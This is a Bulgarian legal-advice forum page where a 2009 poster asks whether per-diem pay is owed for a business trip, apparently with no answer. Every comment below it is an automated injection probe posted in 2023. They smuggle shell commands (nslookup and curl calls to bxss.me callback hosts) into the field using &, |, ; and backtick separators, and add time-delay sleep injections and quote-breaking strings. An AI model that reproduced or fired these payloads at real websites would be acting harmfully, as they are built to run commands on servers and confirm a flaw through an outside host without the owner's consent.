Командировка

22.02.2009г. 09:07:16
Поради възникнала целесъобразност от предприятието в което работя ме командироваха на 40 км в друг град от същата област,като ми заплащат само пътните ,но отказват да ми заплатят дневни.Имам ли право на дневни?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:24
&nslookup -q=cname hitqmkjdrhzui78f0a.bxss.me&'\"`0&nslookup -q=cname hitqmkjdrhzui78f0a.bxss.me&`'
lxbfYeaa
05.10.2023г. 07:24
&(nslookup -q=cname hitkfapohyqmeb370e.bxss.me||curl hitkfapohyqmeb370e.bxss.me)&'\"`0&(nslookup -q=cname hitkfapohyqmeb370e.bxss.me||curl hitkfapohyqmeb370e.bxss.me)&`'
lxbfYeaa
05.10.2023г. 07:24
'"()
lxbfYeaa
05.10.2023г. 07:24
|(nslookup -q=cname hitkvvcubukfgfcdb2.bxss.me||curl hitkvvcubukfgfcdb2.bxss.me)
lxbfYeaa
05.10.2023г. 07:24
'&&sleep(27*1000)*wlyvpi&&'
lxbfYeaa
05.10.2023г. 07:24
`(nslookup -q=cname hitnkxzgejhgpf6231.bxss.me||curl hitnkxzgejhgpf6231.bxss.me)`
lxbfYeaa
05.10.2023г. 07:24
"&&sleep(27*1000)*ndsfmz&&"
lxbfYeaa
05.10.2023г. 07:24
;(nslookup -q=cname hitowzsakwgsed4969.bxss.me||curl hitowzsakwgsed4969.bxss.me)|(nslookup -q=cname hitowzsakwgsed4969.bxss.me||curl hitowzsakwgsed4969.bxss.me)&(nslookup -q=cname hitowzsakwgsed4969.bxss.me||curl hitowzsakwgsed4969.bxss.me)
lxbfYeaa
05.10.2023г. 07:24
'||sleep(27*1000)*axiheu||'
lxbfYeaa
05.10.2023г. 07:24
"||sleep(27*1000)*oohsll||"

Коментар